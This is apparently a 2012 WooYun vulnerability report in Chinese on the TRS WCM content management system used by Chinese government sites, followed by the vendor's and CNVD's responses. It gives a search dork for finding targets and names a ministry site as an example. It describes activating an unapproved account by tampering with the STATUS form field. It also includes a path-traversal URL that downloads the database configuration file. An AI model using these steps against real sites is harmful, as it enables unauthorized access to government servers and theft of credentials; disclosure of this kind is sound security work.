漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2012-06-29: 细节已通知厂商并且等待厂商处理中
2012-07-04: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
可能引起大量政府网站安全问题
详细说明:
首先
site:gov.cn inurl:WCM
TRS 的内容管理系统是国内政府网站使用最多的系统之一
如上面所说:外交部 http://wcm.fmprc.gov.cn/wcm/
网址加上:wcm/console/auth/reg_newuser.jsp
http://localhost:9999/wcm/console/auth/reg_newuser.jsp
注册,注意使用fireBUG修改表单,注意下图
即将随意表单改成 STATUS 值为 30,或增加STATUS字段表单。
然后提交注册
虽然说是“请等待开通!”,但实际上已经开通了,因为 STATUS 字段让我们改成正常了。
直接登陆
虽然没什么权限,但后台存在大量注入等漏洞
如:
可以通过注入直接操作数据库了。
http://localhost:9999/wcm/file/read_file.jsp?FileName=U020120628383491551127/../../../../../Tomcat/webapps/wcm/WEB-INF/classes/trsconfig/domain/config.xml&sDownName=xx
直接下载数据库配置文件
漏洞证明:
上面说过了。
修复方案:
应该懂,先叫官方出补丁,再修吧!
版权声明:转载请注明来源 kobin97@乌云
>
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2012-07-04 11:14
厂商回复:
漏洞Rank:18 (WooYun评价)
最新状态:
2012-07-05:未在互联网实例中复现,不过CNVD工作流程中有失误的环节,首先应该及时根据图片确认,待本地确认后进行处置。致歉。






